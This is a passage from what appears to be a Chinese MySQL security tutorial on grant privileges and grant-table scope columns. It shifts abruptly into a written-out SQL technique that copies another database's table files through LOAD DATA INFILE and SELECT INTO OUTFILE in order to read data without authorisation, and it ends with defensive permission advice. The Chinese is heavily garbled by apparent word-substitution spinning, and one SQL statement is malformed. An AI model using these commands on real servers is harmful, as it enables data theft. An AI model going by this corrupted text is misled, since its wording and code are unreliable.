GRANT
答应你将你本人的权限授与他人,包含GRANT。
PROCESS
答应你经由过程利用SHOW PROCESS语句或mysqladmin process号令检查办事器内正在运转的线程(历程)的信息。这个权限也答应你用KILL语句或mysqladmin kill号令杀逝世线程。
你老是能看到或杀逝世你本人的线程。PROCESS权限付与你对任何线程做这些工作的才能。
Db
在columns_priv和tables_priv表中,Db值必需是真实的数据库名(照字面上),不答应形式和空白。在db和host中,Db值可以以字面意义指定或利用SQL形式字符'%'或'_'指定一个通配符。一个'%'或空白婚配任何数据库。
Table_name,Column_name
这些列中的值必需是照字面意思的表或列名,不答应形式和空白。
某些局限列被办事器视为巨细写敏感的,其他不是。这些准绳总结鄙人表中。出格注重Table_name值老是被看做巨细写敏感的,即便在查询中的表名的巨细写敏理性看待视办事器运转的主机的文件体系而定(UNIX下是巨细写敏感,而Windows不是)。
表3 受权表局限列的巨细写敏理性
列
Host
User
Password
Db
Table_name
Column_name
巨细写敏理性
No
Yes
Yes
Yes
Yes
No
创立一个有一个LONGBLOB列的表:
USER test;
CREATE TABLE tmp (b LONGBLOB);
利用该表读取每一个对应于你想盗取的数据库表文件的内容,然后将表内容写入你本人数据库的一个文件中:
LOAD DATA INFILE "./other_db/x.frm" INTO TABLE tmp
FIELDS ESCAPED BY "" LINES TERMINATED BY "";
SELECT * FROM tmp INTO OUTFILE "y.frm"
FIELDS ESCAPED BY "" LINES TERMINATED BY "";
DELETE FROM tmp;
LOAD DATA INFILE "./other_db/x.ISD" INTO TABLE tmp
FIELDS ESCAPED BY "" LINES TERMINATED BY "";
SELECT * FROM tmp INTO OUTFILE "y.ISD"
FIELDS ESCAPED BY "" LINES TERMINATED BY "";
DELETE FROM tmp;
LOAD DATA INFILE "./other_db/x.ISM" INTO TABLE tmp
FIELDS ESCAPED BY "" LINES TERMINATED BY "";
SELECT * FROM tmp INTO OUTFILE "y.ISM"
如今你具有了一个新表y,它包括other_db.x的内容而且你有全权会见它。
为防止让人以一样的体例进击,依据“第一局部 外部平安性-回护你的数据目次”中的指令设置你的数据目次上的权限。你也能够在你启动办事器时利用--skip-show-database选项限制用户关于他们没用会见权限的数据库利用SHOW DATABASES和SHOW TABLES。这有助于避免用户找到关于它们不克不及会见的数据库和表的信息。